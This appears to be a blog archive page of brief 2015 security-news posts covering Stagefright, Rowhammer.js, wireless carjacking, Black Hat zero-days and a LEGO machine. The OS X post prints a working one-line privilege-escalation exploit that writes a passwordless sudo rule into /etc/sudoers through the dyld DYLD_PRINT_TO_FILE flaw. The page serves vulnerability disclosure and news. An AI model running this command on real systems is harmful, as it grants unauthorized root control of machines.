Jul 15 28

Full disclosure at BlackHat 2015!

stagefrightStagefright’ it gets the title of ‘Mother of all Android Vulnerabilities’, as it impacts 95% of all Android devices out there and do not require any interaction with the victim.

The cause of the problem appears to be a memory error in the processing of MPEG4 and 3GPP video files.

written by d45id \\ tags: , , , , , ,

Jul 15 25

In this paper we [Daniel Gruss, Clémentine Maurice, Stefan Mangard] present Rowhammer.js, a JavaScript-based implementation of the Rowhammer attack. Our attack uses an eviction strategy found by a generic algorithm that improves the eviction rate compared to existing eviction strategies from 95.2% to 99.99%. Rowhammer.js is the first remote software-induced hardware-fault attack. In contrast to other fault attacks it does not require physical access to the machine, or the execution of native code or access to special instructions. As JavaScript-based fault attacks can be performed on millions of users stealthily and simultaneously, we propose countermeasures that can be implemented immediately.

written by d45id \\ tags: , , ,

Jul 15 23

alertSecurity expert Stefan Esser discovered a privilege escalation vulnerability in OS X 10.10. The vulnerability is found in the dynamic linker dyld.

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

OS X 10.11 pre release candidate is not vulnerable. For all the people who want to fix the problem as soon as possible a patch was published by Esser.

written by d45id \\ tags: , , , , , , , , ,

Jul 15 21

…a very interesting article published in wired magazine about wireless carjacking.

written by d45id \\ tags: , , , ,

Jul 15 18

At Black Hat USA security conference 2015 will be presented more than 30 Zero-Day flaws.

„We have 32 different zero-day vulnerabilities that will be disclosed at the event,“ Wylie said. „The zero-days come from a broad swath of topics, including mobile and SCADA [supervisory control and data acquisition] systems.“

I am very curious already.

written by d45id \\ tags: , , ,

Jul 15 10

I’ve seen an very interesting LEGO construction at Hannover IdeenExpo. A near full automated paper cube production machine.

written by d45id \\ tags: , , , , , , , ,